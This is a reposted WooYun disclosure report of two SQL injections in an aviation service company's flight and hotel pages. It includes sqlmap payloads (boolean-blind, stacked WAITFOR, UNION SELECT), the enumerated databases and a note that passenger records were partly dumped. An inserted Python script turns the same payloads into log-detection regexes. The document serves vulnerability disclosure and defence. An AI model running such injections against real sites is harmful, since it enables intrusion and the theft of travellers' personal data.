Beijing Haihua Aviation Service Co., Ltd. (北京海华航空服务有限公司): two SQL injections submitted as one bundle (passenger sensitive data involved)

Posted by admin, 2017-04-19 12:06:03

Summary

2016-04-19: details reported to the vendor, awaiting the vendor's handling
2016-04-22: vendor confirmed; details disclosed to the vendor only
2016-05-02: details disclosed to core white hats and domain experts
2016-05-12: details disclosed to regular white hats
2016-05-22: details disclosed to intern white hats
2016-06-06: details disclosed to the public

Vulnerability overview

Defect ID: WooYun-2016-198192

Title: Beijing Haihua Aviation Service Co., Ltd.: two SQL injections submitted as one bundle (passenger sensitive data involved)

Vendor: Beijing Haihua Aviation Service Co., Ltd.

Author: 路人甲

Submitted: 2016-04-19 20:50

Published: 2016-06-06 15:30

Type: SQL injection

Severity: Medium

Self-assessed rank: 7

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: www.wooyun.org


Vulnerability details

Brief description:

RT (as stated in the title)

Detailed description:

Injection 1:

Code block:
http://**.**.**.**:80/flight/view_xz.aspx?id=9

Injected parameter: id

Code block (sqlmap output):
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y
sqlmap identified the following injection point(s) with a total of 54 HTTP(s) request
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=9 AND 2970=2970

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=9;WAITFOR DELAY '0:0:5'--

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=-4355 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(1
---
[15:09:21] [INFO] testing Microsoft SQL Server
[15:09:21] [INFO] confirming Microsoft SQL Server
[15:09:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:09:22] [INFO] testing if current user is DBA
current user is DBA: False
[15:09:22] [INFO] fetching database names
[15:09:22] [INFO] the SQL query used returns 12 entries
[15:09:22] [INFO] retrieved: AgentDB
[15:09:22] [INFO] retrieved: cmymall
[15:09:23] [INFO] retrieved: cyymall
[15:09:23] [INFO] retrieved: EMall
[15:09:23] [INFO] retrieved: ggtvisa_pek
[15:09:23] [INFO] retrieved: haihua_pek
[15:09:23] [INFO] retrieved: master
[15:09:23] [INFO] retrieved: model
[15:09:23] [INFO] retrieved: msdb
[15:09:23] [INFO] retrieved: phmall
[15:09:23] [INFO] retrieved: tempdb
[15:09:23] [INFO] retrieved: xhmall
available databases [12]:
[*] AgentDB
[*] cmymall
[*] cyymall
[*] EMall
[*] ggtvisa_pek
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] phmall
[*] tempdb
[*] xhmall

Databases:

[screenshot omitted: database listing]

Sensitive passenger data is involved: room booking information, flight, name, serial number, etc.

[screenshot omitted: passenger records]

[screenshot omitted: passenger records]

The data volume is large.

Injection 2:

Code block (HTTP request):
POST /hotel/searchlist.aspx HTTP/1.1
Content-Length: 4430
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: ASP.NET_SessionId=o0xqncikkbxpowepywua33q1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

CheckInDate=01/01/1967&CheckOutDate=01/01/1967&CityCode=1&CityName=%e5%8c%97%e4%ba%ac&CityRegion=&hfMaxPrice=0&hfMinPrice=0&hfRank=&hfRoomNum=1&hotelid=&icityregion=San%20Francisco&PorName=&roomid=&txtHotelName=fqwnbsni&__EVENTVALIDATION=[...]&__VIEWSTATE=[...]&__VIEWSTATEGENERATOR=41450651

Injected parameter: CityCode

Injection result:

[screenshot omitted: injection result]

Proof of vulnerability:

Too slow; stopped dumping.

The data volume is still quite large.
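The sqlmap output above shows three techniques against this MSSQL/ASP.NET site: a boolean tautology (`AND 2970=2970`), a stacked `WAITFOR DELAY`, and a `UNION ALL SELECT` with `CHAR()` concatenation. As an added example that is not part of the original report, the Python below runs those three patterns over constructed IIS-style log lines; the sample log, the rule names and the `scan_*` functions are all my own assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (date time cs-method cs-uri-stem cs-uri-query sc-status),
# modelled on the request shapes sqlmap reported against the site; not real log data.
SAMPLE_LOG = """\
2016-04-19 15:09:20 GET /flight/view_xz.aspx id=9 200
2016-04-19 15:09:21 GET /flight/view_xz.aspx id=9%20AND%202970=2970 200
2016-04-19 15:09:21 GET /flight/view_xz.aspx id=9;WAITFOR%20DELAY%20'0:0:5'-- 200
2016-04-19 15:09:22 GET /flight/view_xz.aspx id=-4355%20UNION%20ALL%20SELECT%20CHAR(113)%2BCHAR(118)-- 500
2016-04-19 15:09:23 GET /hotel/searchlist.aspx CityCode=1 200
"""

# One rule per technique in the sqlmap output (rule names are my own labels).
RULES = [
    ("boolean-blind",   re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("stacked-waitfor", re.compile(r";\s*WAITFOR\s+DELAY\b", re.I)),
    ("union-select",    re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]


def normalize(query: str) -> str:
    """Percent-decode the query string and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(query))


def scan_query(query: str) -> list:
    """Return the names of every rule that matches the decoded query string."""
    text = normalize(query)
    return [name for name, rx in RULES if rx.search(text)]


def scan_log(log_text: str) -> list:
    """Return one finding per log line whose cs-uri-query matches a rule.

    Only the query string is inspected: IIS logs do not record POST bodies, so a
    POST-body injection such as the CityCode one needs request-body logging or a
    WAF in front of the application to be visible at all.
    """
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or line.startswith("#"):
            continue  # header/comment line or malformed line
        date, time, method, stem, query, status = parts[:6]
        hits = scan_query(query)
        if hits:
            findings.append({"time": f"{date} {time}", "method": method,
                             "uri": stem, "status": status, "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```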

Fix recommendation:

You know what to do.

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2016-04-22 15:28

Vendor reply:

CNVD was unable to reproduce the described situation; CNVD has notified the website operator by e-mail through its public contact channel, and the operator will provide a fix subsequently.

Latest status:

None yet

